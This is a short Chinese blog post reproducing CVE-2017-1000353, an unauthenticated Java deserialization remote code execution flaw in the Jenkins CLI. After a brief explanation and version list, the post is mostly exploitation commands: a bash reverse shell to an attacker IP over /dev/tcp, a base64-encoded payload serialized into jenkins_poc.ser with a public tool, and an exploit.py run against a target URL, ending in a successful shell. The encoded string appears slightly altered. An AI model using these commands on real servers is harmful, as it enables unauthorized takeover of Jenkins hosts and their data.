【jenkins】CVE-2017-1000353
0x01漏洞原理
enkins 未授权远程代码执行漏洞, 允许攻击者将序列化的Java SignedObject对象传输给Jenkins CLI处理,反序列化ObjectInputStream作为Command对象,这将绕过基于黑名单的保护机制, 导致代码执行。
0x02影响版本
所有Jenkins主版本均受到影响(包括<=2.56版本)
所有Jenkins LTS 均受到影响( 包括<=2.46.1版本)
所有Jenkins LTS 均受到影响( 包括<=2.46.1版本)
0x03漏洞复现
工具:
https://github.com/vulhub/CVE-2017-1000353
反弹shell
https://forum.ywhack.com/reverse-shell/
/bin/bash -i >& /dev/tcp/1.xxxx/9999 0>&1
编码
https://r0yanx.com/tools/java_exec_encode
生成二进制文件jenkins_poc.ser
java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "bash -c {echo,L2Jpbi9iYXNoIC1pID4mIdddddddddC9kZXYvdGNwLzEuMTE3LjE1OS4xOTAvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}"
利用payload
python2 exploit.py http://1.xxxxx:8080/ jenkins_poc.ser
反弹shell成功
苟利国家生死以,岂因福祸避趋之
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 地球OL攻略 —— 某应届生求职总结
· 周边上新:园子的第一款马克杯温暖上架
· Open-Sora 2.0 重磅开源!
· 提示词工程——AI应用必不可少的技术
· .NET周刊【3月第1期 2025-03-02】